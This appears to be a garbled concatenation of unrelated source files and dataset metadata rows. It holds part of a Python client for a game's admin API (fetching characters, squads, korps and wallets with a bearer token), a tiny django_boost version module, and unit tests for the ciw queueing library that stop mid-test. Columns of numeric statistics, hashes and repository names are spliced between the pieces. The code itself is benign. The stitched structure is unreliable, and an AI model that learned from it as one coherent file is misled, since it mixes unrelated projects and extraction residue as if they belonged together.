        return None
    # Deliberately best-effort, but never a bare `except:` — that would
    # also swallow KeyboardInterrupt/SystemExit.
    except Exception:
        return None
def api_admin_mypcs(discordname):
    """Fetch all of a user's player characters via the admin API.

    Returns the API payload, or None on a non-200 status / empty body.
    """
    url = f'{API_URL}/admin/mypcs'
    payload = {'discordname': discordname}
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200 and response.text:
        return response.json()['payload']
    return None
def api_admin_squad(squadid):
    """Fetch a squad by id via the admin API.

    Returns the API payload when the call succeeds and the API reports
    success; otherwise None.
    """
    url = f'{API_URL}/admin/squad'
    payload = {'squadid': squadid}
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200 and response.text:
        # Parse once instead of calling json.loads twice on the same body.
        data = response.json()
        if data['success']:
            return data['payload']
    return None
def api_admin_squads():
    """Fetch all squads via the admin API.

    Returns the API payload when the call succeeds and the API reports
    success; otherwise None.
    """
    url = f'{API_URL}/admin/squads'
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.get(url, headers=headers)
    if response.status_code == 200 and response.text:
        data = response.json()
        if data['success']:
            return data['payload']
    return None
def api_admin_korp(korpid):
    """Fetch a korp by id via the admin API.

    Returns the API payload when the call succeeds and the API reports
    success; otherwise None.
    """
    url = f'{API_URL}/admin/korp'
    payload = {'korpid': korpid}
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200 and response.text:
        data = response.json()
        if data['success']:
            return data['payload']
    return None
def api_admin_korps():
    """Fetch all korps via the admin API.

    Returns the API payload when the call succeeds and the API reports
    success; otherwise None.
    """
    url = f'{API_URL}/admin/korps'
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.get(url, headers=headers)
    if response.status_code == 200 and response.text:
        data = response.json()
        if data['success']:
            return data['payload']
    return None
def api_admin_mypc_pa(discordname, pcid, redpa, bluepa):
    """Set a player character's red/blue PA via the admin API.

    Returns the API payload, or None on a non-200 status / empty body.
    """
    url = f'{API_URL}/admin/mypc/pa'
    payload = {'discordname': discordname, 'pcid': pcid, 'redpa': redpa, 'bluepa': bluepa}
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200 and response.text:
        return response.json()['payload']
    return None
def api_admin_mypc_wallet(discordname, pcid):
    """Fetch a player character's wallet via the admin API.

    Returns the API payload, or None on a non-200 status / empty body.
    """
    url = f'{API_URL}/admin/mypc/wallet'
    payload = {'discordname': discordname, 'pcid': pcid}
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    response = requests.post(url, json=payload, headers=headers)
    if response.status_code == 200 and response.text:
        return response.json()['payload']
    return None
def api_admin_mypc_equipment(discordname, pcid):
    """Fetch a player character's equipment via the admin API.

    Best-effort: returns the API payload, or None on any HTTP error,
    non-200 status, or empty/invalid body.
    """
    url = f'{API_URL}/admin/mypc/equipment'
    payload = {'discordname': discordname, 'pcid': pcid}
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    try:
        response = requests.post(url, json=payload, headers=headers)
        if response.status_code == 200 and response.text:
            return response.json()['payload']
        return None
    # Best-effort, but not a bare `except:` (would swallow SystemExit).
    except Exception:
        return None
def external_meta_load(type):
    """Load a public meta JSON ('weapons' or 'armors') from PCS_URL.

    Returns the parsed JSON, or None for an unknown category or on any
    HTTP/parsing failure.

    NOTE: the parameter name shadows the builtin `type`; kept unchanged
    so keyword callers are not broken.
    """
    # Guard clause instead of building the URL inside an if/else ladder.
    if type not in ('weapons', 'armors'):
        return None
    url = f'{PCS_URL}/resources/metas/{type}.json'
    try:
        response = requests.get(url)
        if response.status_code == 200 and response.text:
            return response.json()
        return None
    # Best-effort, but not a bare `except:` (would swallow SystemExit).
    except Exception:
        return None
def api_admin_mypc_stats(discordname, pcid):
    """Fetch a player character's stats via the admin API.

    Best-effort: returns the API payload, or None on any HTTP error,
    non-200 status, or empty/invalid body.
    """
    url = f'{API_URL}/admin/mypc/stats'
    payload = {'discordname': discordname, 'pcid': pcid}
    headers = {'Authorization': f'Bearer {API_ADMIN_TOKEN}'}
    try:
        response = requests.post(url, json=payload, headers=headers)
        if response.status_code == 200 and response.text:
            return response.json()['payload']
        return None
    # Best-effort, but not a bare `except:` (would swallow SystemExit).
    except Exception:
        return None
| 32.690722
| 91
| 0.611637
| 726
| 6,342
| 5.217631
| 0.088154
| 0.101373
| 0.080781
| 0.099789
| 0.862724
| 0.831309
| 0.805438
| 0.797782
| 0.76188
| 0.748944
| 0
| 0.009108
| 0.255598
| 6,342
| 193
| 92
| 32.860104
| 0.793264
| 0.003154
| 0
| 0.740506
| 0
| 0
| 0.153165
| 0.040665
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088608
| false
| 0
| 0.018987
| 0
| 0.316456
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
95a9298cd09118914f446b9ae72e03836e5c4a10
| 88
|
py
|
Python
|
django_boost/core/__init__.py
|
ayumuhack/django-boost
|
bf4358cd219934bffa264bf3e3d10e2acfb77ad6
|
[
"MIT"
] | null | null | null |
django_boost/core/__init__.py
|
ayumuhack/django-boost
|
bf4358cd219934bffa264bf3e3d10e2acfb77ad6
|
[
"MIT"
] | null | null | null |
django_boost/core/__init__.py
|
ayumuhack/django-boost
|
bf4358cd219934bffa264bf3e3d10e2acfb77ad6
|
[
"MIT"
] | null | null | null |
from django_boost import __version__ as VERSION
def get_version():
    """Return the django_boost package version string (its __version__)."""
    return VERSION
| 14.666667
| 47
| 0.784091
| 12
| 88
| 5.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 88
| 5
| 48
| 17.6
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
95b64f2bf75c8941b8863ab457cc3e9f1e465b69
| 34,152
|
py
|
Python
|
ciw/tests/test_network.py
|
EmmaAspland/Ciw
|
4f677f646681e68af05d2e8d6d0e49783917f1f2
|
[
"MIT"
] | null | null | null |
ciw/tests/test_network.py
|
EmmaAspland/Ciw
|
4f677f646681e68af05d2e8d6d0e49783917f1f2
|
[
"MIT"
] | null | null | null |
ciw/tests/test_network.py
|
EmmaAspland/Ciw
|
4f677f646681e68af05d2e8d6d0e49783917f1f2
|
[
"MIT"
] | null | null | null |
import unittest
import ciw
import copy
import random
from hypothesis import given
from hypothesis.strategies import floats, integers, lists, random_module
def example_baulking_function(n):
    """Example baulking probability: 0.0 while fewer than 5 customers are
    present, 1.0 (always baulk) from 5 upwards."""
    return 1.0 if n >= 5 else 0.0
class TestServiceCentre(unittest.TestCase):
    """Tests for ciw.ServiceCentre construction."""

    def test_init_method(self):
        # Constructor arguments should be stored unchanged; preempt
        # defaults to False.
        number_of_servers = 2
        queueing_capacity = 'Inf'
        class_change_matrix = [[0.2, 0.8],
                               [1.0, 0.0]]
        schedule = None
        SC = ciw.ServiceCentre(number_of_servers, queueing_capacity, class_change_matrix, schedule)
        self.assertEqual(SC.number_of_servers, number_of_servers)
        self.assertEqual(SC.queueing_capacity, queueing_capacity)
        self.assertEqual(SC.class_change_matrix, class_change_matrix)
        self.assertEqual(SC.schedule, schedule)
        self.assertFalse(SC.preempt)

    @given(number_of_servers=integers(min_value=1),
           queueing_capacity=integers(min_value=0),
           class_change_prob1=floats(min_value=0.0, max_value=1.0),
           class_change_prob2=floats(min_value=0.0, max_value=1.0))
    def test_init_method_h(self, number_of_servers, queueing_capacity, class_change_prob1, class_change_prob2):
        # Property-based variant of test_init_method (hypothesis args).
        class_change_matrix = [[class_change_prob1,
                                1 - class_change_prob1],
                               [class_change_prob2,
                                1 - class_change_prob2]]
        schedule = None
        SC = ciw.ServiceCentre(number_of_servers, queueing_capacity, class_change_matrix, schedule)
        self.assertEqual(SC.number_of_servers, number_of_servers)
        self.assertEqual(SC.queueing_capacity, queueing_capacity)
        self.assertEqual(SC.class_change_matrix, class_change_matrix)
        self.assertEqual(SC.schedule, schedule)
        self.assertFalse(SC.preempt)
class TestCustomerClass(unittest.TestCase):
    """Tests for ciw.CustomerClass construction."""

    def test_init_method(self):
        # Constructor arguments should be stored unchanged, and the stored
        # baulking function should behave like example_baulking_function.
        arrival_distributions = [["Uniform", 4.0, 9.0],
                                 ["Exponential", 5],
                                 ["Gamma", 0.6, 1.2]]
        service_distributions = [["Gamma", 4.0, 9.0],
                                 ["Uniform", 0.6, 1.2],
                                 ["Exponential", 5]]
        transition_matrix = [[.2, .6, .2], [0, 0, 0], [.5, 0, 0]]
        priority_class = 2
        baulking_functions = [None, None, example_baulking_function]
        batching_distributions = [['Deterministic', 1],
                                  ['Deterministic', 1],
                                  ['Deterministic', 1]]
        CC = ciw.CustomerClass(arrival_distributions, service_distributions, transition_matrix, priority_class, baulking_functions, batching_distributions)
        self.assertEqual(CC.arrival_distributions, arrival_distributions)
        self.assertEqual(CC.service_distributions, service_distributions)
        self.assertEqual(CC.batching_distributions, batching_distributions)
        self.assertEqual(CC.transition_matrix, transition_matrix)
        self.assertEqual(CC.priority_class, priority_class)
        # check baulking function works
        self.assertEqual(CC.baulking_functions[2](0), 0.0)
        self.assertEqual(CC.baulking_functions[2](1), 0.0)
        self.assertEqual(CC.baulking_functions[2](2), 0.0)
        self.assertEqual(CC.baulking_functions[2](3), 0.0)
        self.assertEqual(CC.baulking_functions[2](4), 0.0)
        self.assertEqual(CC.baulking_functions[2](5), 1.0)
        self.assertEqual(CC.baulking_functions[2](6), 1.0)
        self.assertEqual(CC.baulking_functions[2](7), 1.0)
        self.assertEqual(CC.baulking_functions[2](8), 1.0)
class TestNetwork(unittest.TestCase):
    """Tests for ciw.Network and the create_network_from_* entry points."""

    def test_init_method(self):
        # A Network built from ServiceCentre/CustomerClass objects should
        # expose counts and priority mappings derived from its inputs.
        number_of_servers = 2
        queueing_capacity = 'Inf'
        schedule = None
        class_change_matrix = [[0.2, 0.8],
                               [1.0, 0.0]]
        arrival_distributions = [["Uniform", 4.0, 9.0],
                                 ["Exponential", 5.0],
                                 ["Gamma", 0.6, 1.2]]
        service_distributions = [["Gamma", 4.0, 9.0],
                                 ["Uniform", 0.6, 1.2],
                                 ["Exponential", 5]]
        transition_matrix = [[0.2, 0.6, 0.2],
                             [0.0, 0.0, 0.0],
                             [0.5, 0.0, 0.0]]
        priority_class = 0
        batching_distributions = [['Deterministic', 1],
                                  ['Deterministic', 1],
                                  ['Deterministic', 1]]
        baulking_functions = [None, None, example_baulking_function]
        service_centres = [ciw.ServiceCentre(number_of_servers,
                                             queueing_capacity,
                                             class_change_matrix,
                                             schedule) for i in range(4)]
        customer_classes = [ciw.CustomerClass(arrival_distributions,
                                              service_distributions,
                                              transition_matrix,
                                              priority_class,
                                              baulking_functions,
                                              batching_distributions) for i in range(2)]
        N = ciw.Network(service_centres, customer_classes)
        self.assertEqual(N.service_centres, service_centres)
        self.assertEqual(N.customer_classes, customer_classes)
        self.assertEqual(N.number_of_nodes, 4)
        self.assertEqual(N.number_of_classes, 2)
        self.assertEqual(N.number_of_priority_classes, 1)
        self.assertEqual(N.priority_class_mapping, {0:0, 1:0})

    def test_create_network_from_dictionary(self):
        # Case 1: single node, single class, dict-keyed distributions.
        params = {'Arrival_distributions': {'Class 0': [['Exponential', 3.0]]},
                  'Service_distributions': {'Class 0': [['Exponential', 7.0]]},
                  'Number_of_servers': [9],
                  'Transition_matrices': {'Class 0': [[0.5]]},
                  'Queue_capacities': ['Inf']}
        N = ciw.create_network_from_dictionary(params)
        self.assertEqual(N.number_of_nodes, 1)
        self.assertEqual(N.number_of_classes, 1)
        self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
        self.assertEqual(N.service_centres[0].number_of_servers, 9)
        self.assertEqual(N.service_centres[0].class_change_matrix, None)
        self.assertEqual(N.service_centres[0].schedule, None)
        self.assertFalse(N.service_centres[0].preempt)
        self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
        self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
        self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
        self.assertEqual(N.number_of_priority_classes, 1)
        self.assertEqual(N.priority_class_mapping, {0:0})
        # Case 2: two nodes with a server schedule on node 1.
        params = {'Arrival_distributions': [['Exponential', 3.0],
                                            ['Uniform', 0.2, 0.6]],
                  'Service_distributions': [['Exponential', 7.0],
                                            ['Deterministic', 0.7]],
                  'Number_of_servers': [[[1, 20], [4, 50]], 3],
                  'Transition_matrices': [[0.5, 0.2],
                                          [0.0, 0.0]],
                  'Queue_capacities': [10, 'Inf']
                  }
        N = ciw.create_network_from_dictionary(params)
        self.assertEqual(N.number_of_nodes, 2)
        self.assertEqual(N.number_of_classes, 1)
        self.assertEqual(N.service_centres[0].queueing_capacity, 10)
        self.assertEqual(N.service_centres[0].number_of_servers, 'schedule')
        self.assertEqual(N.service_centres[0].class_change_matrix, None)
        self.assertEqual(N.service_centres[0].schedule, [[1, 20], [4, 50]])
        self.assertFalse(N.service_centres[0].preempt)
        self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
        self.assertEqual(N.service_centres[1].number_of_servers, 3)
        self.assertEqual(N.service_centres[1].class_change_matrix, None)
        self.assertEqual(N.service_centres[1].schedule, None)
        self.assertFalse(N.service_centres[1].preempt)
        self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Uniform', 0.2, 0.6]])
        self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Deterministic', 0.7]])
        self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5, 0.2], [0.0, 0.0]])
        self.assertEqual(N.number_of_priority_classes, 1)
        self.assertEqual(N.priority_class_mapping, {0:0})
        # Case 3: two classes with a class-change matrix on node 1.
        params = {'Arrival_distributions': {'Class 0': [['Exponential', 3.0]],
                                            'Class 1': [['Exponential', 4.0]]},
                  'Service_distributions': {'Class 0': [['Exponential', 7.0]],
                                            'Class 1': [['Uniform', 0.4, 1.2]]},
                  'Number_of_servers': [9],
                  'Transition_matrices': {'Class 0': [[0.5]],
                                          'Class 1': [[0.0]]},
                  'Queue_capacities': ['Inf'],
                  'Class_change_matrices': {'Node 1': [[0.0, 1.0],
                                                       [0.2, 0.8]]}}
        N = ciw.create_network_from_dictionary(params)
        self.assertEqual(N.number_of_nodes, 1)
        self.assertEqual(N.number_of_classes, 2)
        self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
        self.assertEqual(N.service_centres[0].number_of_servers, 9)
        self.assertEqual(N.service_centres[0].class_change_matrix, [[0.0, 1.0], [0.2, 0.8]])
        self.assertEqual(N.service_centres[0].schedule, None)
        self.assertFalse(N.service_centres[0].preempt)
        self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
        self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
        self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
        self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 4.0]])
        self.assertEqual(N.customer_classes[1].service_distributions, [['Uniform', 0.4, 1.2]])
        self.assertEqual(N.customer_classes[1].transition_matrix, [[0.0]])
        self.assertEqual(N.number_of_priority_classes, 1)
        self.assertEqual(N.priority_class_mapping, {0:0, 1:0})
        # Case 4: explicit priority classes.
        params = {'Arrival_distributions': {'Class 0': [['Exponential', 3.0]],
                                            'Class 1': [['Exponential', 4.0]]},
                  'Service_distributions': {'Class 0': [['Exponential', 7.0]],
                                            'Class 1': [['Uniform', 0.4, 1.2]]},
                  'Number_of_servers': [9],
                  'Transition_matrices': {'Class 0': [[0.5]],
                                          'Class 1': [[0.0]]},
                  'Queue_capacities': ['Inf'],
                  'Priority_classes': {'Class 0': 1,
                                       'Class 1': 0}}
        N = ciw.create_network_from_dictionary(params)
        self.assertEqual(N.number_of_nodes, 1)
        self.assertEqual(N.number_of_classes, 2)
        self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
        self.assertEqual(N.service_centres[0].number_of_servers, 9)
        self.assertEqual(N.service_centres[0].schedule, None)
        self.assertFalse(N.service_centres[0].preempt)
        self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
        self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
        self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
        self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 4.0]])
        self.assertEqual(N.customer_classes[1].service_distributions, [['Uniform', 0.4, 1.2]])
        self.assertEqual(N.customer_classes[1].transition_matrix, [[0.0]])
        self.assertEqual(N.customer_classes[0].priority_class, 1)
        self.assertEqual(N.customer_classes[1].priority_class, 0)
        self.assertEqual(N.number_of_priority_classes, 2)
        self.assertEqual(N.priority_class_mapping, {0:1, 1:0})
        # Case 5: three nodes with baulking functions.
        params = {'Arrival_distributions': [['Exponential', 3.0], ['Exponential', 4.0], ['Exponential', 2.0]],
                  'Service_distributions': [['Exponential', 7.0], ['Uniform', 0.4, 1.2], ['Deterministic', 5.33]],
                  'Number_of_servers': [9, 2, 4],
                  'Transition_matrices': [[0.5, 0.0, 0.1],
                                          [0.2, 0.1, 0.0],
                                          [0.0, 0.0, 0.0]],
                  'Queue_capacities': ['Inf', 'Inf', 'Inf'],
                  'Baulking_functions': [None, None, example_baulking_function]}
        N = ciw.create_network_from_dictionary(params)
        self.assertEqual(N.number_of_nodes, 3)
        self.assertEqual(N.number_of_classes, 1)
        self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
        self.assertEqual(N.service_centres[0].number_of_servers, 9)
        self.assertEqual(N.service_centres[0].schedule, None)
        self.assertFalse(N.service_centres[0].preempt)
        self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
        self.assertEqual(N.service_centres[1].number_of_servers, 2)
        self.assertEqual(N.service_centres[1].schedule, None)
        self.assertFalse(N.service_centres[1].preempt)
        self.assertEqual(N.service_centres[2].queueing_capacity, float('Inf'))
        self.assertEqual(N.service_centres[2].number_of_servers, 4)
        self.assertEqual(N.service_centres[2].schedule, None)
        self.assertFalse(N.service_centres[2].preempt)
        self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Exponential', 4.0], ['Exponential', 2.0]])
        self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Uniform', 0.4, 1.2], ['Deterministic', 5.33]])
        self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5, 0.0, 0.1],
                                                                   [0.2, 0.1, 0.0],
                                                                   [0.0, 0.0, 0.0]])
        self.assertEqual(N.customer_classes[0].baulking_functions, [None, None, example_baulking_function])
        self.assertEqual(N.number_of_priority_classes, 1)

    def test_create_network_from_yml(self):
        # Loading the reference YAML fixture should reproduce its
        # capacities, server counts and per-class distributions exactly.
        N = ciw.create_network_from_yml(
            'ciw/tests/testing_parameters/params.yml')
        self.assertEqual(N.number_of_nodes, 4)
        self.assertEqual(N.number_of_classes, 3)
        self.assertEqual(N.service_centres[0].queueing_capacity, 20)
        self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
        self.assertEqual(N.service_centres[2].queueing_capacity, 30)
        self.assertEqual(N.service_centres[3].queueing_capacity, float('Inf'))
        self.assertEqual(N.service_centres[0].number_of_servers, 9)
        self.assertEqual(N.service_centres[1].number_of_servers, 10)
        self.assertEqual(N.service_centres[2].number_of_servers, 8)
        self.assertEqual(N.service_centres[3].number_of_servers, 8)
        self.assertEqual(N.service_centres[0].class_change_matrix, None)
        self.assertEqual(N.service_centres[1].class_change_matrix, None)
        self.assertEqual(N.service_centres[2].class_change_matrix, None)
        self.assertEqual(N.service_centres[3].class_change_matrix, None)
        self.assertEqual(N.service_centres[0].schedule, None)
        self.assertEqual(N.service_centres[1].schedule, None)
        self.assertEqual(N.service_centres[2].schedule, None)
        self.assertEqual(N.service_centres[3].schedule, None)
        self.assertFalse(N.service_centres[0].preempt)
        self.assertFalse(N.service_centres[1].preempt)
        self.assertFalse(N.service_centres[2].preempt)
        self.assertFalse(N.service_centres[3].preempt)
        self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Exponential', 7.0], ['Exponential', 4.0], ['Exponential', 1.0]])
        self.assertEqual(N.customer_classes[1].arrival_distributions, [['Exponential', 2.0], ['Exponential', 3.0], ['Exponential', 6.0], ['Exponential', 4.0]])
        self.assertEqual(N.customer_classes[2].arrival_distributions, [['Exponential', 2.0], ['Exponential', 1.0], ['Exponential', 2.0], ['Exponential', 0.5]])
        self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0], ['Exponential', 7.0], ['Gamma', 0.4, 0.6], ['Deterministic', 0.5]])
        self.assertEqual(N.customer_classes[1].service_distributions, [['Exponential', 7.0], ['Triangular', 0.1, 0.85, 0.8], ['Exponential', 8.0], ['Exponential', 5.0]])
        self.assertEqual(N.customer_classes[2].service_distributions, [['Deterministic', 0.3], ['Deterministic', 0.2], ['Exponential', 8.0], ['Exponential', 9.0]])
        self.assertEqual(N.customer_classes[0].transition_matrix, [[0.1, 0.2, 0.1, 0.4], [0.2, 0.2, 0.0, 0.1], [0.0, 0.8, 0.1, 0.1], [0.4, 0.1, 0.1, 0.0]])
        self.assertEqual(N.customer_classes[1].transition_matrix, [[0.6, 0.0, 0.0, 0.2], [0.1, 0.1, 0.2, 0.2], [0.9, 0.0, 0.0, 0.0], [0.2, 0.1, 0.1, 0.1]])
        self.assertEqual(N.customer_classes[2].transition_matrix, [[0.0, 0.0, 0.4, 0.3], [0.1, 0.1, 0.1, 0.1], [0.1, 0.3, 0.2, 0.2], [0.0, 0.0, 0.0, 0.3]])

    def test_raising_errors(self):
        # Each invalid mutation of an otherwise-valid parameter dict
        # should make create_network_from_dictionary raise ValueError.
        params = {'Arrival_distributions': {'Class 0':[['Exponential', 3.0]]},
                  'Service_distributions': {'Class 0':[['Exponential', 7.0]]},
                  'Number_of_servers': [9],
                  'Number_of_classes': 1,
                  'Transition_matrices': {'Class 0': [[0.5]]},
                  'Number_of_nodes': 1,
                  'Queue_capacities': ['Inf'],
                  'Detect_deadlock': False}
        params_list = [copy.deepcopy(params) for i in range(23)]
        params_list[0]['Number_of_classes'] = -2
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[0])
        params_list[1]['Number_of_nodes'] = -2
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[1])
        params_list[2]['Number_of_servers'] = [5, 6, 7]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[2])
        params_list[3]['Number_of_servers'] = [-3]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[3])
        params_list[4]['Number_of_servers'] = ['my_missing_schedule']
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[4])
        params_list[5]['Queue_capacities'] = ['Inf', 1, 2]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[5])
        params_list[6]['Queue_capacities'] = [-2]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[6])
        params_list[7]['Arrival_distributions'] = {'Class 0':[['Exponential', 3.2]],
                                                   'Class 1':[['Exponential', 2.1]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[7])
        params_list[8]['Arrival_distributions'] = {'Patient 0':[['Exponential', 11.5]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[8])
        params_list[9]['Arrival_distributions']['Class 0'] = [['Exponential', 3.1],
                                                             ['Exponential', 2.4]]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[9])
        params_list[10]['Service_distributions'] = {'Class 0':[['Exponential', 3.2]],
                                                    'Class 1':[['Exponential', 2.1]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[10])
        params_list[11]['Service_distributions'] = {'Patient 0':[['Exponential', 11.5]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[11])
        params_list[12]['Service_distributions']['Class 0'] = [['Exponential', 3.1],
                                                              ['Exponential', 2.4]]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[12])
        params_list[13]['Transition_matrices'] = {'Class 0':[[0.2]],
                                                  'Class 1':[[0.3]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[13])
        params_list[14]['Transition_matrices'] = {'Patient 0':[[0.5]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[14])
        params_list[15]['Transition_matrices']['Class 0'] = [[0.2], [0.1]]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[15])
        params_list[16]['Transition_matrices']['Class 0'] = [[0.2, 0.1]]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[16])
        params_list[17]['Transition_matrices']['Class 0'] = [[-0.6]]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[17])
        params_list[18]['Transition_matrices']['Class 0'] = [[1.4]]
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[18])
        params_list[19]['Class_change_matrices'] = {'Node 1':[[0.0]],
                                                    'Node 2':[[0.0]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[19])
        params_list[20]['Class_change_matrices'] = {'Patient 0':[[0.0]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[20])
        params_list[21]['Class_change_matrices'] = {'Node 1':[[-0.4]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[21])
        params_list[22]['Class_change_matrices'] = {'Node 1':[[1.5]]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params_list[22])
class TestImportNoMatrix(unittest.TestCase):
    """Tests that a transition matrix is optional for one-node networks."""

    def test_optional_transition_matrix(self):
        # Omitting Transition_matrices for a single node should default to
        # an all-zero matrix per class; for multiple nodes it must raise.
        params = {'Arrival_distributions': [['Exponential', 1.0]],
                  'Service_distributions': [['Exponential', 2.0]],
                  'Number_of_servers': [1]}
        N = ciw.create_network(**params)
        self.assertEqual([c.transition_matrix for c in N.customer_classes], [[[0.0]]])
        N = ciw.create_network(
            Arrival_distributions={'Class 0': [['Exponential', 1.0]],
                                   'Class 1': [['Exponential', 1.0]]},
            Service_distributions={'Class 0': [['Exponential', 2.0]],
                                   'Class 1': [['Exponential', 1.0]]},
            Number_of_servers=[1]
        )
        self.assertEqual([c.transition_matrix for c in N.customer_classes], [[[0.0]], [[0.0]]])
        params = {'Arrival_distributions': [['Exponential', 1.0], ['Exponential', 1.0]],
                  'Service_distributions': [['Exponential', 2.0], ['Exponential', 2.0]],
                  'Number_of_servers': [1, 2]}
        self.assertRaises(ValueError, ciw.create_network_from_dictionary, params)
class TestCreateNetworkKwargs(unittest.TestCase):
def test_network_from_kwargs(self):
N = ciw.create_network(
Arrival_distributions={'Class 0': [['Exponential', 3.0]]},
Service_distributions={'Class 0': [['Exponential', 7.0]]},
Number_of_servers=[9],
Transition_matrices={'Class 0': [[0.5]]},
Queue_capacities=['Inf']
)
self.assertEqual(N.number_of_nodes, 1)
self.assertEqual(N.number_of_classes, 1)
self.assertEqual(N.service_centres[0].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[0].number_of_servers, 9)
self.assertEqual(N.service_centres[0].class_change_matrix, None)
self.assertEqual(N.service_centres[0].schedule, None)
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0]])
self.assertEqual(N.customer_classes[0].service_distributions, [['Exponential', 7.0]])
self.assertEqual(N.customer_classes[0].transition_matrix, [[0.5]])
self.assertEqual(N.number_of_priority_classes, 1)
self.assertEqual(N.priority_class_mapping, {0:0})
N = ciw.create_network(
Arrival_distributions=[['Exponential', 3.0],
['Uniform', 0.2, 0.6]],
Service_distributions=[['Exponential', 7.0],
['Deterministic', 0.7]],
Number_of_servers=[[[1, 20], [4, 50]], 3],
Transition_matrices=[[0.5, 0.2],
[0.0, 0.0]],
Queue_capacities=[10, 'Inf']
)
self.assertEqual(N.number_of_nodes, 2)
self.assertEqual(N.number_of_classes, 1)
self.assertEqual(N.service_centres[0].queueing_capacity, 10)
self.assertEqual(N.service_centres[0].number_of_servers, 'schedule')
self.assertEqual(N.service_centres[0].class_change_matrix, None)
self.assertEqual(N.service_centres[0].schedule, [[1, 20], [4, 50]])
self.assertFalse(N.service_centres[0].preempt)
self.assertEqual(N.service_centres[1].queueing_capacity, float('Inf'))
self.assertEqual(N.service_centres[1].number_of_servers, 3)
self.assertEqual(N.service_centres[1].class_change_matrix, None)
self.assertEqual(N.service_centres[1].schedule, None)
self.assertFalse(N.service_centres[1].preempt)
self.assertEqual(N.customer_classes[0].arrival_distributions, [['Exponential', 3.0], ['Uniform', 0.2, 0.6]])
